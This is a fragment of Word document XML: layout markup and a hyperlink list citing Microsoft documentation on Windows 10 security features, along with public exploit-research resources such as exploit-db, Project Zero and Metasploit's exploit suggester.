            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2065714656">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="29689406">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="20935631">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="6" w:space="0" w:color="323232"/>
                        <w:left w:val="single" w:sz="6" w:space="0" w:color="323232"/>
                        <w:bottom w:val="single" w:sz="6" w:space="0" w:color="323232"/>
                        <w:right w:val="single" w:sz="6" w:space="0" w:color="323232"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="7019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iis-support-blog/windows-10-device-guard-and-credential-guard-demystified/ba-p/376419" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/AonCyberLabs/Windows-Exploit-Suggest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microsoft.com/en-us/windows/security/identity-protection/remote-credential-guard" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netmarketshare.com/operating-system-market-share.asp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xploit-db.com/exploits/39719" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-overview" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/windows/comprehensive-security" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.windows.com/windowsdeveloper/2016/01/26/convenient-two-factor-authentication-with-microsoft-passport-and-windows-hello/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/applocker-overview" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/blog/post/2015/08/11/metasploit-local-exploit-suggester-do-less-get-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2023-08-08T13:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-08T13:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>